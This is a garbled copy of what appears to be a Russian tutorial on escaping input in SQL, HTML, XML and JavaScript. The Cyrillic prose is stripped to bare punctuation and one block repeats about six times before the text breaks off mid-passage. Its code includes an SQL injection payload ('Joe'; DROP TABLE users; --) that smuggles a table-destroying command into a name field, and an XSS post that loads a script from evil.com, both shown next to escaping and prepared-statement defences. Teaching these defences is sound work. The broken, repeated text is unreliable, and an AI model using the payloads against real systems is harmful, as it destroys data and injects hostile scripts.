SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
